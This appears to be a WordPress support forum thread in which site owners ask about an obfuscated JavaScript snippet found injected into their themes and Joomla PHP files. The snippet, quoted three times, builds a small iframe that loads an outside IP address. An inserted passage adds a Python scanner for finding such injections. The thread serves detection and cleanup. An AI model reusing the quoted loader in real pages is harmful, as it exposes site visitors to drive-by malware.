• What’s this for ???

    <script>
    z1=document.createElement("if"+String.fromCharCode(114)+"ame");
    sz=String.fromCharCode(60-11);
    z1.setAttribute("s"+String.fromCharCode(114)+"c","http://"+"178.86."+"0.137/in."+"cgi?def"+"ault");
    z1.setAttribute("wid"+"th",sz);
    z1.setAttribute("heig"+"ht",sz);
    function zp(zb){document.body.appendChild(zb);}
    void(zp(z1));
    </script><script>
    z1=document.createElement("if"+String.fromCharCode(114)+"ame");
    sz=String.fromCharCode(60-11);
    z1.setAttribute("s"+String.fromCharCode(114)+"c","http://"+"178.86."+"0.137/in."+"cgi?def"+"ault");
    z1.setAttribute("wid"+"th",sz);
    z1.setAttribute("heig"+"ht",sz);
    function zp(zb){document.body.appendChild(zb);}
    void(zp(z1));
    </script>

Viewing 13 replies - 1 through 13 (of 13 total)
  • got me
    where is it?

    I have got the same script in one of the Joomla sites that I was working on, in many PHP files. What is this? I found

    <script>
    z1=document.createElement("if"+String.fromCharCode(114)+"ame");
    sz=String.fromCharCode(60-11);
    z1.setAttribute("s"+String.fromCharCode(114)+"c","http://"+"178.86."+"0.137/in."+"cgi?def"+"ault");
    z1.setAttribute("wid"+"th",sz);
    z1.setAttribute("heig"+"ht",sz);
    function zp(zb){document.body.appendChild(zb);}
    void(zp(z1));
    </script>

    Is this a virus?

    anybody got any reason of this yet?

    Have you tried searching your local copy of the site to see exactly which file this is coming from? Or is it only showing on the server?

    If you don’t have a local copy of the site, I’d download the entire site to a temporary folder on your hard drive and do a search there. Knowing which file this is in will help narrow down the issue.
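An added example, not part of the original thread: a plain text search for "iframe" or "src" over the downloaded copy finds nothing, because the posted script splits those words across string concatenations and `String.fromCharCode()` calls. This Python sketch folds those pieces back into plain strings before searching; the function names and the sample (which uses the documentation address 192.0.2.1) are constructed for illustration.

```python
import re
from pathlib import Path

_CHARCODE = re.compile(r'String\.fromCharCode\(\s*(\d+(?:\s*[-+]\s*\d+)*)\s*\)')
_CONCAT = re.compile(r'''(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3''')
_IFRAME = re.compile(r'''createElement\(\s*["']iframe["']\s*\)''', re.I)
_SRC = re.compile(r'''setAttribute\(\s*["']src["']\s*,\s*["']([^"']+)["']''', re.I)

# Constructed sample modelled on the snippet in this thread (hypothetical host).
SAMPLE = '''<?php echo "ok"; ?><script>
z1=document.createElement("if"+String.fromCharCode(114)+"ame");
sz=String.fromCharCode(60-11);
z1.setAttribute("s"+String.fromCharCode(114)+"c","http://"+"192.0."+"2.1/in."+"cgi?def"+"ault");
</script>'''

def _eval_sum(expr):
    """Evaluate integer arithmetic such as '60-11' without calling eval()."""
    total, sign = 0, 1
    for tok in re.findall(r'[-+]|\d+', expr):
        if tok.isdigit():
            total += sign * int(tok)
        else:
            sign = 1 if tok == '+' else -1
    return total

def fold_strings(js):
    """Resolve fromCharCode() calls and literal concatenations to plain strings."""
    def to_char(m):
        code = _eval_sum(m.group(1))
        ok = 32 <= code < 127 and chr(code) not in '"\'\\'
        return '"%s"' % chr(code) if ok else m.group(0)
    js, prev = _CHARCODE.sub(to_char, js), None
    while prev != js:  # each pass joins adjacent literal pairs; repeat until stable
        prev = js
        js = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(2), m.group(4)), js)
    return js

def scan_text(text):
    """Return iframe src URLs if the folded text creates an iframe, else None."""
    folded = fold_strings(text)
    return _SRC.findall(folded) if _IFRAME.search(folded) else None

def scan_tree(root, exts=(".php", ".js", ".html", ".htm")):
    """Map each file under root that builds an iframe to the URLs it would load."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            urls = scan_text(path.read_text(errors="replace"))
            if urls is not None:
                hits[str(path)] = urls
    return hits
```

Calling `scan_tree()` on the folder holding the downloaded site lists every file that carries the injection, which also gives a quick way to confirm a restored copy is clean.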

    zoonini wrote:

    Have you tried searching your local files to see exactly which file this is coming from? Or is it only showing on the server?
    If you only have a copy of the site on the server, I’d download the entire site to a temporary folder on your hard drive and do a search there. Knowing which file this is in will help narrow down the issue.

    It was in a live site and was running properly. Suddenly today it happened. I had to delete all files unfortunately as a matter of urgent restoring. But it had been found in many PHP files in the entire Joomla site.

    thanks

    Mostanser – so you’re saying the moment this code appeared your site stopped working? Sounds like something malicious, then, though I can’t find any online sources to verify this.

    zoonini wrote:

    Mostanser – so you’re saying the moment this code appeared your site stopped working? Sounds like something malicious, then, though I can’t find any online sources to verify this.

    Correct, just wondering if anyone else got this issue. I see the member “presasportiva” got the same issue (maybe) in WordPress. Just wanted to monitor its activity.

    thanks

    Mostanser – I would go through this checklist over at the Joomla! forums, if you haven’t already:

    Has your site been compromised? READ THIS
    http://forum.joomla.org/viewtopic.php?f=432&t=335090

    Presasportiva – are you running the latest version of WP? Do you have any security plug-ins installed?

    I recommend WordPress File Monitor as it emails you the moment a file has changed (added/edited/deleted) on the server, which can help you act on and trace malicious activity more easily and quickly.

    http://wordpress.org/extend/plugins/wordpress-file-monitor/

    Thread Starter presasportiva

    (@presasportiva)

    That’s a script in my WordPress template… Modularity version 2.5

    After the upgrade to the latest version of WordPress my template crashes…

    Or I’ve been hacked… I don’t know yet…

    Thread Starter presasportiva

    (@presasportiva)

    zoonini, thank you very much! I will install it ASAP as I find the problem… because all the other templates work fine… despite the Modularity one…

    thank you

    I have a site, Двери в Витебске and Гранд кафе, it is on CMS DLE. My question is whether I can transfer it to CMS WORDPRESS; I should leave the design the same, and both the structure of the site and the menu should remain the same too.
    P.S. Sorry for my level of English
    thank you

    Hi Presaportiva – if that script is right in the theme files, I strongly suggest you contact the makers of Modularity and ask them directly about it.

    Gogi2 – I suggest you start a new thread for your question as it’s a totally new issue and will get lost here. Thanks!

    Yes, we have received this in the last few days; it’s a virus.

    We still have not recovered

    http://vuegame.com

    as you can see. By the way, if you’ve got more sites, they will have hacked them too


The topic ‘unknown script’ is closed to new replies.